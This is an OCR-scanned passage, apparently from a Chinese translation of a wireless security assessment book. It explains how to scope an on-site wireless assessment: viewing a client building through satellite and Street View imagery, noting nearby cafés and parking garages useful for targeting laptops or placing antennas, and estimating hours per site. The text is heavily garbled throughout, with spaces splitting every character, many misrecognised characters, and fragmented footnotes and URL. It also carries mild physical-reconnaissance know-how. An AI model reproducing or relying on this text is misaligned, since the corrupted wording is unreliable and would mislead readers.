纽约 办 公 室 的 所 在 地 ， 访 所 在 地 相当 大 ， 同 时 也 被 其 他 大 的 多 层 办 公 场 所 所 包围 。 
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图 A-2 ”从 Mictosoft 公 司 的 Bing 地 图 网 站 上 乌 隔 的 效果 


目 上 而 下 看 的 效果 图 ( 见 图 A-3) 不 能 给 出 这 样 的 视角 ， 这 会 导致 错误 地 计算 ， 只 能 到 了 站 点 后 才能 看 清 。 


_ 一 一 
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图 A-3 ”从 Microsoft 公 司 的 Bing 地 图 网 站 上 从 上 人 往 下 看 的 效果 


请 记 住 ， 当 使 用 卫星 图 像 来 计划 一 项 无 线 评估 工作 时 ， 所 使 用 的 那些 公开 的 卫星 图 像 通 常 不 是 很 新 ， 这 是 因为 像 Microsoft 
和 谷歌 等 提供 这 些 图 像 的 公司 需要 将 图 像 应 用 于 公共 领域 信息 (或 者 至 少 人 允许 公开 购买 的 信息 ) ， 出 于 国家 安全 原因 只 得 如 此 。 


对 于 那些 需要 准确 地 图 的 组 织 (例如 军 方 ) 则 可 以 提供 不 断 更 新 的 最 新 的 信息 。 所 以 当 你 到 达 现 场 时 ， 如 果 有 一 个 新 的 建筑 物 已 
经 竖立 起 来 ， 或 者 一 条 街 已 被 改变 ,或 者 你 正在 查看 的 设施 与 从 卫星 图 像 上 看 到 的 不 同时 ， 不 要 感到 惊讶 。 


另 一 种 收集 信息 的 方法 是 使 用 谷歌 地 图 的 “谷歌 地 图 街景 视图 ”功能 。 当 你 所 要 访问 的 站 点 允许 以 这 种 方式 访问 时 中， 该 工 
具 可 以 让 你 坐 在 目 己 的 家 中 ， 束 能 更 有 效 地 观察 站 点 。 昌 然 卫 星 图 像 可 以 帮助 无 线 评估 人 员 通 过 估计 站 点 的 尺寸 和 位 置 ， 束 可 以 
算出 该 站 后 需要 的 工作 量 ， 也 可 以 看 到 站 点 的 外 观 ， 并 使 评估 人 员 判 断 周 围 有 哪些 有 用 的 定位 等 。 图 A-4 显 示 了 McGraw-Hill 纽 
约 办 公 室 周围 的 一 些 区 域 。 


Google miaps | [1221 Aue of the Americas, New York NY 10020-1095 | Saarch Maps: | show search cptone 
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图 A-4 从 “谷歌 地 图 街景 视图 ”上 看 到 的 McGraw-Hil 纽 约 办 公 室 效果 


如 果 没 有 使 用 GPS 装置 ， 你 可 以 收集 一 些 地 标 以 防 万 一 在 去 站 点 的 途中 迷路 。 街 景 视图 也 可 以 用 于 了 解 周边 情况 。 也 许 ， 那 
个 从 办 公 室 出 来 的 人 ， 随 后 所 访问 的 咖啡 店 是 位 于 建筑 的 底层 。 工 作 的 笔记 本 电脑 可 能 会 尝试 连接 到 公司 的 无 线 基础 设施 ， 并 且 
无 线 评估 人 员 可 能 也 想 利 用 这 些 目标 ( 详 见 第 5 章 ) 。 也 许 该 建筑 物 的 街 对 面 有 一 个 停车 场 建筑 ， 在 那里 你 可 以 搭建 一 个 远 距 离 
天 线 。 这 些 友 现 有 助 于 评估 人 员 在 到 达 现 场 之 前 残 可 以 通过 这 种 方法 完成 评估 工作 ， 从 而 证 省 评估 的 时 间 。 
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收集 信息 是 第 一 步 。 将 收集 到 的 信息 全 部 结合 起 来 ， 评 估 一 下 工作 量 是 最 终 的 目标 。 当 从 事 无 线 评估 的 时 候 ， 没 有 满意 的 公 
式 能 估算 工作 量 。 你 不 能 通过 “在 这 个 地 址 有 一 个 1 万 平方 英尺 的 2 层 大 楼 ， 有 5 个 无 线 接 入 点 ， 这 个 公式 是 说 ， 我 需要 8.6 小 时 
才能 完成 任务 ”。 不 过 ， 通 过 我 们 在 评估 和 计算 工作 量 时 ， 已 被 证 实 有 用 的 评估 经 历 ， 也 总 结 了 一 些 经 验 : 


. 第 一 个 站 操 将 是 花费 时 间 最 长 的 如 果 客 户 并 不 确定 当 你 到 达 立 占 点 时 将 看 什么 ， 那么 么 你 所 发 现 的 东西 将 是 你 的 第 一 次 的 经 
验 。 另 外 ， 后 乡 卖 的 站 点 能 会 参考 这 一 站 点 所 获得 的 经 验 ， 所 以 随 后 屠 些 地 点 的 评估 会 变 得 很 快 。 然而 ， 第 一 个 站 ， 下 通常 将 会 遇 
到 各 种 新 的 情况 ， 并 且 也 将 是 花费 时 间 最 长 才 完 成 的 。 


笃 辰 ( 通 党 ) 比 规模 更 麻烦 ”我 们 曾 给 一 个 100 万 平方 英尺 的 配送 中 心 做 无 线 评 估 ， 如 果 单 独 按 尺寸 估计 工作 量 ， 将 会 花 


一 整 天 或 更 长 的 时 间 。 然 而 ， 实 际 上 整个 评估 只 用 了 几 个 小 时 ， 其 中 大 部 分 时 间 花 在 了 该 设施 的 漫游 上 。 这 是 因为 配送 中 心 位 
于 “前 不 着 村 ， 后 不 着 店 ”的 地 方 ， 根 本 也 没有 无 线 设施 ， 如 果 没 有 无 线 基础 设施 进行 评估 ， 那 么 无 线 评估 当然 也 不 会 需要 很 长 


时 间 ! 然而 ， 我 们 到 达 一 个 非常 小 的 办 公 室 时 算 错 了 工作 量 ， 之 前 我 们 假设 只 需 花 费 很 短 的 时 间 。 但 该 小 办 公 室 竟然 填 满 了 无 线 
AP， 既 有 合法 接 入 点 ， 也 有 骗子 接 入 点 ， 因 此 我 们 原来 的 所 估计 的 半天 时 间 是 远 远 不 够 的 。 


(有 一 定 ) 富 容 量 地 估计 任何 评估 在 完成 后 都 会 留 下 一 些 富余 问题 。 航 班 将 被 推迟 ， 交 通 将 变 缓 慢 ， 小 办 公 室 将 变 得 密 
集 ， 大 办 公 室 将 变 得 更 空 。 与 任何 项 目 一 样 ， 一 定 要 考虑 多 一 些 ， 以 便于 操作 的 速度 比 预期 的 快 ， 这 与 没有 足够 的 时 间 而 赶 任 务 
相 比 ， 这 样 做 会 产生 更 多 更 好 的 产品 。 当 然 ， 特 别 是 为 了 项 目 ， 对 按 小 时 支付 费用 的 第 三 方 ， 客 户 往 往 不 喜欢 粗 粒 度 的 时 间 舍 
计 。 我 们 发 现 ， 半 天 (4 小 时 ) 时 间 一 般 足 够 用 于 : 为 一 个 小 型 办 公 室 的 无 线 漫游 做 评估 、 为 无 线 接 入 点 进行 编目 、 做 最 小 的 渗 
透 测 试 等 工作 。 如 果 需 要 其 他 活动 ， 评 估 所 花费 的 时 间 将 大 大 增加 。 在 一 个 正常 工作 日 ， 每 天 访问 1~2 个 站 点 是 一 个 合理 的 预 
期 ， 在 项 目的 尾声 时 留 下 来 的 一 些 时 间 可 以 重新 访问 一 个 或 多 个 站 点 以 防 其 他 的 事情 进一步 调查 。 但 是 ， 你 的 结果 可 能 会 有 
所 不 同 。 


希望 以 上 内 容 可 以 帮 你 在 无 线 评估 前 正确 估计 出 工作 范围 和 使 用 精力 。 当 然 ， 在 站 点 所 要 米 用 的 具体 行动 应 该 取决 于 实际 所 
需 精 力 ， 对 任何 项 目 来 说 ， 除 了 考虑 评估 本 身 之 外 ， 还 要 考虑 许多 其 他 万 面 的 问题 。 


[1] 严格 地 说 ， 该 照片 地 址 是 : http://maps.google.com/maps? 
和 

译 者 注 

[2] 与 图 A-1 所 对 应 的 实际 谷歌 地 图 的 左下 角 ， 有 一 个 长 度 的 图 例 告诉 图 上 某 个 单位 的 实际 长 度 ， 图 例 未 在 图 A-1 上 标 出 。 一 一 译 
者 注 

3] 在 谷歌 地 图 上 ， 并 不 是 所 有 的 地 方 都 能 使 用 这 一 功能 。 


84.337749&spn=0.002377,，0.004812&t=h&z=18&vpstc=0。 


译 者 注 


